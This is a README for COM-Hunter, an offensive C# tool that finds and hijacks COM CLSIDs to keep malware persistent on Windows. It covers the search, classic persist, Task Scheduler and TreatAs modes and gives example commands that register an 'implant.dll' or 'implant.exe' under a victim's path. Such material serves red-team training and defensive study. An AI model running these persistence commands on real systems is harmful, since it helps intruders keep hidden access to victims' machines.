COM Hijacking VOODOO
COM-Hunter is a COM Hijacking persistnce tool written in C#.
The following list explains the available modes:
- Search Mode: Searches for CLSIDs based on
LocalServer32,InprocServer32, and registry hivesHKLMandHKCU. - Classic Persist Mode: Performs classic COM hijacking persistence using
LocalServer32orInprocServer32. - Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using
LocalServer32orInprocServer32. - TreatAs Mode: Performs COM hijacking persistence via the TreatAs registry key and a fake (forwardable) CLSID using
LocalServer32orInprocServer32.
If you find any bugs, don’t hesitate to report them. Your feedback is valuable in improving the quality of this project!
The authors and contributors of this project are not liable for any illegal use of the tool. It is intended for educational purposes only. Users are responsible for ensuring lawful usage.
This project created with ❤️ by @nickvourd && @S1ckB0y1337.
Special thanks to my friend Marios Gyftos for his invaluable assistance during the beta testing phase of this tool.
Inspired by the RTO course from @zeropointsecltd.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 2.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM-Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
ℹ️ Search DLL and EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Search EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Advanced search EXE implementations in HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Search EXE and DLL implementations in HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Perform classic persistence using DLL implementation:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Perform classic persistence using EXE implementation:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Perform persistence via Task Scheduler using DLL implementation:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Perform persistence via the TreatAs registry key and a fake (forwardable) CLSID using DLL implementation:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
- Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
- COM Objects Hijacking by Virus Total
